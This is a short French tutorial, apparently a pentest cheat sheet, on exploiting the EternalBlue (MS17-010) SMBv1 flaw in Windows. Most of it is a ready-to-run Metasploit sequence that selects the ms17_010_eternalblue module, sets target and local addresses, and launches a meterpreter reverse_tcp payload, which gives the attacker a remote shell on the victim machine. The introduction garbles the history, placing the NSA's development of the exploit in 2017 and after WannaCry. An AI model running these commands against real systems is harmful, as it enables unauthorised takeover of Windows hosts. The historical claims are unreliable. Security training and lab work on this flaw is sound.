[Exploitation/Windows] Eternal Blue
Introduction
L'exploit Eternal Blue a été développé par la NSA en 2017. Il fait suite à l'exploitation de la vulnérabilité MS17-010 lors de la campagne de Ransomware Wannacry.
La faille est présente dans la v1 du protcole SMB et permet notamment une RCE.
Exploitation avec Metasploit
- Tout d'abord lancez la console Metasploit :
msfconsole
- Sélectionnez l'exploit :
use exploit/windows/smb/ms17_010_eternalblue
- Définissez les options :
set rhosts <TARGET_IP>
set lhost <LOCAL_IP>
set lport <PORT>
set payload windows/x64/meterpreter/reverse_tcp
- Puis lancez l'exploit :
run